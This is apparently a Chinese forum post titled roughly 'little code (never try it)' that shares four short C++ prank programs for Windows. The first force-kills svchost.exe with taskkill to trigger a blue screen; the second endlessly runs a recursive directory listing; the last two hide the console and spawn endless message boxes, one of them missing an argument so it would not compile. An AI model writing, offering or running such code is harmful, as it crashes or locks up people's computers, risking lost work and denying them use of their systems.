- 分享
小代码(千万别试)
- @ 2026-4-7 16:13:20
#include<bits/stdc++.h> using namespace std; int main(){ system("C:\Windows\System32\taskkill.exe /im svchost.exe /f"); system("wininit"); return 0; } //蓝屏
#include<bits/stdc++.h> using namespace std; int main(){ system("color a"); while(1){ system("dir/s"); } return 0; }
#include<windows.h> #include<bits/stdc++.h> using namespace std; int main(){ FreeConsole(); while(1){ MessageBoxA(NULL,"WINDOW","WINDOW"); } return 0; }
#include<windows.h> #include<bits/stdc++.h> using namespace std; int main(){ FreeConsole(); while(1){ MessageBoxA(NULL,"WINDOW","WINDOW",NULL); } return 0; }